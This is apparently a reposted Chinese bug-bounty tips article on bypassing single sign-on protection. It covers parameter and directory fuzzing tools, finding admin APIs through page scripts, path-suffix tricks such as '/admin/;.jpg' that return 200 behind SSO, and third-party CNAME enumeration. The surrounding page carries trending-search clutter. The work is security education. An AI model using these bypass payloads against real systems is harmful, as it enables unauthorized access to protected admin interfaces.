🔥 热搜 🔥
百度今日热点微信公众平台贴吧opggdnf私服百度贴吧知乎dnf公益服百度傻逼
分类
社会娱乐国际人权科技经济其它
🔥 热搜 🔥
上海习近平新疆鄂州父女瓜乌鲁木齐疫情H工口小学生赛高习明泽芊川一笑图包印尼排华
分类
社会娱乐国际人权科技经济其它
查看原文
其他

你所不知道的sso绕过tips

hussein98d 迪哥讲事 2023-07-11
收录于合集
#bug bounty 386 个
#access control 68 个
#sso bypass 2 个

你所不知道的sso绕过

sso bypass相关

通常所用的方法:

1.暴力破解

2.弱密码

3.apis目录暴力破解

暴力破解的思路

不要只寻找目录和文件,在每个有效的接口上找到可以暴力破解的参数

相关工具:

https://github.com/PortSwigger/param-miner

https://github.com/ffuf/ffuf

https://github.com/s0md3v/Arjun

Fuzzing

https://admin.org.com =====================> ok

https://admin.org.com/blabla =====================> 404

https://admin.org.com/internal.php =====================> 301 Redirect

https://admin.org.com/internal.php?id=1 =====================> 200 ok

APIs

https://admin.org.com =====================> 200 OK then redirect to SSO

view-source:https://admin.org.com =====================> <script src=/admin.js></script> ===================> /api/admin/users

https://admin.org.com/api/admin/users =====================> 200 OK

鲜为人知的字典

https://gist.github.com/richard1230/8186e508163b7ed251345c9214433add

https://org.com/admin/$FUZZ$

鲜为人知的绕过技巧

https://org.com/admin/;.jpg
https://org.com/admin/valid-file.jsp;.jpg



https://internal.org.com =====================> sso
https://internal.org.com/test.js =====================> sso
https://internal.org.com/test.jpg =====================> 404
https://internal.org.com/;.jpg =====================> 200 ok



https://internal.org.com =====================> sso
dig CNAME internal.org.com =====================> org.3rdparty.com
gau –subs 3rdparty.com =====================> hey.3rdparty.com/authentication/register
https://internal.org.com/authentication/register =====================> 200 ok



您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存